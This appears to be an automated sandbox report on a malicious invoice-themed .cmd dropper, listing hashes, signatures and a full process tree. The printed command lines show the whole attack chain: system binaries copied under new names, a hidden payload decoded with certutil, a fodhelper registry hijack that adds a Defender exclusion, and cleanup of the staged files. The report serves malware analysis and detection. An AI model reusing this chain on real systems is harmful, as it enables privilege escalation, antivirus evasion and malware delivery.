eff779d4af4ddcc1833f1a8d877564dd7142431a48c0ac3364775a8a73802ee4

General

Target

INV200495000-PAY ORDER0940584.cmd
Size

3.0MB
MD5

ba6011bbbcee0c141db0c45b8219a275
SHA1

e8fe383f4b6614b70fe9902618660aad3199bb62
SHA256

a7d331358f0530d1b5780f18ded9587256f16a675b1f440ebb73c92979d9719b
SHA512

3b1145ff9512fc0d7e3dcbae431cd3424e12721c17a4be043ca2b4ddd7ab4db5f9670ea07e75eedfad8d928b9fe08ca2412d062375b1df25e9ed31aa25fdfadf
SSDEEP

49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4Kh:7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
1800	alpha.exe
2216	alpha.exe
1764	alpha.exe
2004	alpha.exe
2636	kn.exe
2716	alpha.exe
2540	alpha.exe
2596	alpha.exe
2624	alpha.exe
3036	xkn.exe
2960	alpha.exe
3012	ger.exe
1768	alpha.exe
2796	kn.exe
2828	alpha.exe
2032	Ping_c.pif
336	alpha.exe
784	alpha.exe
780	alpha.exe
888	alpha.exe
2420	alpha.exe
2708	alpha.exe
2020	alpha.exe
1092	alpha.exe

Loads dropped DLL 15 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exeWerFault.exe

pid	process
3028	cmd.exe
3028	cmd.exe
3028	cmd.exe
3028	cmd.exe
2004	alpha.exe
3028	cmd.exe
3028	cmd.exe
3028	cmd.exe
3028	cmd.exe
2624	alpha.exe
3036	xkn.exe
3036	xkn.exe
2960	alpha.exe
1240	WerFault.exe
1240	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1240 2032 WerFault.exe Ping_c.pif
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2948 taskkill.exe

pid	pid_target	process	target process
1240	2032	WerFault.exe	Ping_c.pif

pid	process
2948	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings	ger.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

2032 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

3036 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 3036 xkn.exe
Token: SeDebugPrivilege 2948 taskkill.exe

pid	process
2032	Ping_c.pif

pid	process
3036	xkn.exe

description	pid	process
Token: SeDebugPrivilege	3036	xkn.exe
Token: SeDebugPrivilege	2948	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 3028 wrote to memory of 2516	3028	cmd.exe	extrac32.exe
PID 3028 wrote to memory of 2516	3028	cmd.exe	extrac32.exe
PID 3028 wrote to memory of 2516	3028	cmd.exe	extrac32.exe
PID 3028 wrote to memory of 1800	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1800	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1800	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2216	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2216	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2216	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1764	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1764	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1764	3028	cmd.exe	alpha.exe
PID 1764 wrote to memory of 2052	1764	alpha.exe	extrac32.exe
PID 1764 wrote to memory of 2052	1764	alpha.exe	extrac32.exe
PID 1764 wrote to memory of 2052	1764	alpha.exe	extrac32.exe
PID 3028 wrote to memory of 2004	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2004	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2004	3028	cmd.exe	alpha.exe
PID 2004 wrote to memory of 2636	2004	alpha.exe	kn.exe
PID 2004 wrote to memory of 2636	2004	alpha.exe	kn.exe
PID 2004 wrote to memory of 2636	2004	alpha.exe	kn.exe
PID 3028 wrote to memory of 2716	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2716	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2716	3028	cmd.exe	alpha.exe
PID 2716 wrote to memory of 2592	2716	alpha.exe	extrac32.exe
PID 2716 wrote to memory of 2592	2716	alpha.exe	extrac32.exe
PID 2716 wrote to memory of 2592	2716	alpha.exe	extrac32.exe
PID 3028 wrote to memory of 2540	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2540	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2540	3028	cmd.exe	alpha.exe
PID 2540 wrote to memory of 2272	2540	alpha.exe	extrac32.exe
PID 2540 wrote to memory of 2272	2540	alpha.exe	extrac32.exe
PID 2540 wrote to memory of 2272	2540	alpha.exe	extrac32.exe
PID 3028 wrote to memory of 2596	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2596	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2596	3028	cmd.exe	alpha.exe
PID 2596 wrote to memory of 2236	2596	alpha.exe	extrac32.exe
PID 2596 wrote to memory of 2236	2596	alpha.exe	extrac32.exe
PID 2596 wrote to memory of 2236	2596	alpha.exe	extrac32.exe
PID 3028 wrote to memory of 2624	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2624	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2624	3028	cmd.exe	alpha.exe
PID 2624 wrote to memory of 3036	2624	alpha.exe	xkn.exe
PID 2624 wrote to memory of 3036	2624	alpha.exe	xkn.exe
PID 2624 wrote to memory of 3036	2624	alpha.exe	xkn.exe
PID 3036 wrote to memory of 2960	3036	xkn.exe	alpha.exe
PID 3036 wrote to memory of 2960	3036	xkn.exe	alpha.exe
PID 3036 wrote to memory of 2960	3036	xkn.exe	alpha.exe
PID 2960 wrote to memory of 3012	2960	alpha.exe	ger.exe
PID 2960 wrote to memory of 3012	2960	alpha.exe	ger.exe
PID 2960 wrote to memory of 3012	2960	alpha.exe	ger.exe
PID 3028 wrote to memory of 1768	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1768	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 1768	3028	cmd.exe	alpha.exe
PID 1768 wrote to memory of 2796	1768	alpha.exe	kn.exe
PID 1768 wrote to memory of 2796	1768	alpha.exe	kn.exe
PID 1768 wrote to memory of 2796	1768	alpha.exe	kn.exe
PID 3028 wrote to memory of 2828	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2828	3028	cmd.exe	alpha.exe
PID 3028 wrote to memory of 2828	3028	cmd.exe	alpha.exe
PID 2828 wrote to memory of 2948	2828	alpha.exe	taskkill.exe
PID 2828 wrote to memory of 2948	2828	alpha.exe	taskkill.exe
PID 2828 wrote to memory of 2948	2828	alpha.exe	taskkill.exe
PID 3028 wrote to memory of 2032	3028	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:2516

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:1800

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:2216

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2052

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2636

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:2592

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:2272

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:2236

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2624

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2960

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:3012

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:2796

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 692
3⤵
- Loads dropped DLL
- Program crash
PID:1240

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:336

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:784

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:780

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:888

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2420

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2708

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2020

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1092

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\Ping_c.pif
Filesize
1.1MB

MD5
cf0406a9f208a43a3a3eccf1769f55d5

SHA1
7a8d7bde7f7ffacbda4847f354d62e311312f071

SHA256
8bd6792495e882b3f5604fc9cf7fdc1357d38c5297593951bb26aa9309765df8

SHA512
ae35345f9a0d00de0f147056ad8f8c700eca6860ac869c28f6b71ef70f71bee96f8efeb5e2d7d8a75eee2aafeac34124ff5acc947c608478ee478332d9130b00

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
2.2MB

MD5
d7e89c5831e8bcb061122aa646bf5815

SHA1
d98375cc44cdb2662fafc4db36674833347a7ef7

SHA256
f6ed12b8c9298e89a282c473e2022c477116da4aee339e27569eb15368bf2076

SHA512
b497f8971be6958f0868d9c9ea68ade02e1ff18506360af5eda2ba87ac32a510fdb7dfd41701b1d894ec5901232fc3abe74ab2ff5fb0ba821936dde1b6914054

Download Submit
C:\Users\Public\ger.exe
Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
C:\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2032-71-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/3036-43-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download
memory/3036-44-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads